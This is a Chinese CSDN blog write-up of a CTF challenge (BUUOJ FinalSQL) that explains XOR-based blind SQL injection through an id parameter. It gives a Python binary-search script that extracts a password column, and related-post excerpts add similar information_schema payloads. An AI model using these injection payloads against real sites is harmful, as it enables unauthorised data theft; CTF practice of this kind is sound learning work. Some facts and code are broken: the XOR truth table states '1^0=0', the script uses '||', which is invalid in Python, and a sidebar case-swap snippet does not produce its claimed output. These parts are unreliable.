[极客大挑战 2019]FinalSQL(异或盲注)

最新推荐文章于 2024-08-09 18:17:35 发布
最新推荐文章于 2024-08-09 18:17:35 发布
阅读量573 收藏
点赞数 1
分类专栏: Web刷题记录 文章标签: php python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/111466794
版权

前言

文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!

题目

在这里插入图片描述
测试一下登录,发现是个幌子,因为给过滤掉的东西太多了,但是点击上面的1~5按钮,发现url出现id字样
在这里插入图片描述
再FUZZ测试一下发现盲注可行
异或'^'是一种数学运算,1^1=0 0^0=0 1^0=0,可以用来进行sql注入,当两条件相同时(同真同假)结果为假,当两条件不同时(一真一假)结果为真
1^1有ERROR字样,1^0则为这个界面,所以脚本我们可以这样写

import requests
flag=''
for i in range(1,250):
	left=32
	right=128
	mid=(left+right)//2
	while(left<right):
		res=requests.get('http://e487615c-08e4-4b1d-a3d2-fae355b974c9.node3.buuoj.cn/search.php?id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)'%(i,mid))
		if 'ERROR' in res.text:
			left=mid+1
		else:
			right=mid
		mid=(left+right)//2
	if(mid==32 || mid==127):
		break
	flag=flag+chr(mid)
	print(flag)

这里只写了最后爆破出flag的一步,爆破表列名等操作都差不多就不写了

小 白 萝 卜
关注
专栏目录
[极客挑战 2019]FinalSQL - 异或盲注
oZuoShen123的博客
10-05 538
1、这题的关键是找注入点,如果选择用户名、密码作为输入点就麻烦了 2、注入点:按钮,点击就传id;当id=1时,提示Click others   可以利用id的特性,构造异或匹配   payload: f"1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{j},1))={i})^1"   payload有两个异或:1^表达式^1
[极客挑战 2019]FinalSQL wp
{OvEr}的博客
11-19 472
[极客挑战 2019]FinalSQL wp 终极sql注入了,考点是盲注(写脚本的那种இ௰இ) 打开网页是这样的。 那个红色的卡片,我们随便点进去看看,直接点最后一个吧。 通过url判断注入点是id。 接着做FUZZ测试,发现同样过滤了union、or、and、||、&等我们常用的关键字,但是没有过滤异或符号^。 当我们输入id=1^1时,回显"Error" 当我们输入id=1^0时,回显正常 接下来我们进行盲注,下面是大神的脚本 step 1爆数据库 import requests u
buuctf [极客挑战 2019]FinalSQL
zoixsoadji的博客
03-30 762
进入题目,又是这个作者,试试万能密码 经过实验,双写什么的都没用。 作者说的神秘代码,点进去发现url变了 发现并没有什么卵用…… 正当我没有头绪的时候,我突然看到一句话,审题真的很重要: 盲注!这里附上大佬的脚本: import requests import time url = "http://def9937b-1746-4f41-98c7-a2b55b95664a.node4.buuoj.cn:81/search.php" temp = {"id" : ...
[极客挑战 2019]FinalSQL
qq_43801002的博客
08-02 1687
题目 过程 1.提示盲注,找注入口,fuzz看过滤情况,使用bp自带的字典即可。 2.’^‘没有被过滤,输入1^1回显’ERROR’,1^0回显’NO! Not this! Click others~~~’,判断出为数字型注入 由于空格被过滤,用()代替。 1^(ord(substr((select(group_concat(schema_name))from(information_schema.schema ta)),%d,1))=%d)^1"%(i,ord(j)) 获取数据库名称 1^(ord
[极客挑战 2019]FinalSQL1
kw741951的博客
08-09 289
break(参考博客)# 如果为真时的关键字匹配。sql注入,点击1试一下。得到flag倒序,更正为。
[极客挑战 2019]FinalSQL异或盲注,二分法加多线程)
weixin_43610673的博客
06-16 666
点到第三个找到注入点,异或盲注,但这题很恶心,最后爆值的时候flag前面有很多无用信息,遂将这题当作脚本编写练习题,将嫖来的二分法脚本加上了多线程(只用二分法要跑10分钟) 这是别人博客嫖来的二分法注入脚本 https://www.cnblogs.com/wangtanzhi/p/12305052.html #sql injection.py # -*- coding: UTF-8 -*- import re import requests import string url = "http://1de
[极客挑战 2019]FinalSQL 1
plant1234的博客
04-30 1990
[极客挑战 2019]FinalSQL 1 首先打开题目,发现是一个sql注入: 寻找注入点发现注入点在: 发现是一个盲注,且过滤了and和空格等 并且直接盲注比较慢,还需要利用二分法来编写脚本 大佬脚本: import requests url = "http://b4d7330a-4880-41c4-a20c-3dae55d11c37.node4.buuoj.cn:81/search.php" flag = '' def payload(i, j): sql = "1^(ord(
【reverse】2021 极客挑战(部分)
woodwhale的博客
11-29 3709
【reverse】2021 极客挑战(部分) 1、调试 0x1 什么?得安装linux虚拟机?像我这种直接用ubuntu系统的根本不虚! 0x2 尝试直接运行,未果 拖入ida中分析,先看main 上来就比较字符串,然后返回,v4是栈里的变量,初始化为0,必然不等于后面的字符串 看看汇编,发现了端倪 如果不相等就去loc_14A0这个函数,发现这个函数直接退出了,没啥用 我们看看如果想等跳转的函数loc_14551。怎么说都比上面退出的函数正常吧。 0x3 到这里我们想直接调用到loc_14
buuoj [极客挑战 2019]FinalSQL
pondzhang的专栏
04-02 541
import requests #database length def get_database_length(): count = 0 while(1): url = "http://5a0d5a51-9667-4813-b173-b276246a28bc.node3.buuoj.cn/search.php?id=1^1^(length(database()...
BUUCTF-[极客挑战 2019]FinalSQL
weixin_44016181的博客
09-15 469
除了普通的注入流程,报错注入,时间注入外,这题涉及了布尔注入当中的异或注入,根据回显的状态信息来获取数据库的相关信息。这样即便是我们不能直接调用和查看数据库,也能通过这种特别的注入方式得到flag。
NO.2-26 [极客挑战 2019]FinalSQL
nigo134的博客
08-03 217
根据题目提示盲注,随便点几下找到注入点 发现我们输入^符号成功跳转页面,证明存在注入 1^(ord(substr((select(group_concat(schema_name))from(information_schema.schema ta)),%d,1))=%d)^1"%(i,ord(j)) 获取数据库名称 1^(ord(substr((select(group_concat(table_name))from(information_schema.tables) where(table_s
python大小写交换异或
最新发布
10-15
Python中,如果你想交换字符串中字符的大写和小写,可以使用位运算中的异或(XOR)操作。异或通常用于二进制数据处理,但在这里我们可以巧妙地利用其特性,因为大写字母和小写字母在ASCII码表上相隔32。对于每个字符,你可以将其转换为对应的ASCII值,应用异或操作,然后再转换回字符。 这里是一个简单的例子: ```python def swap_case(s): swapped = "" for char in s: if 'a' <= char <= 'z': # 如果是小写字母 swapped += chr((ord(char) - ord('a') + 32) % 26 + ord('a')) # 将小写转为大写并取模防止超出范围 elif 'A' <= char <= 'Z': # 如果是大写字母 swapped += chr((ord(char) - ord('A') + 32) % 26 + ord('A')) # 同理将大写转为小写 else: swapped += char # 非字母字符不变 return swapped # 示例 s = "Hello World!" print(swap_case(s)) # 输出: hELLO wORLD! ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值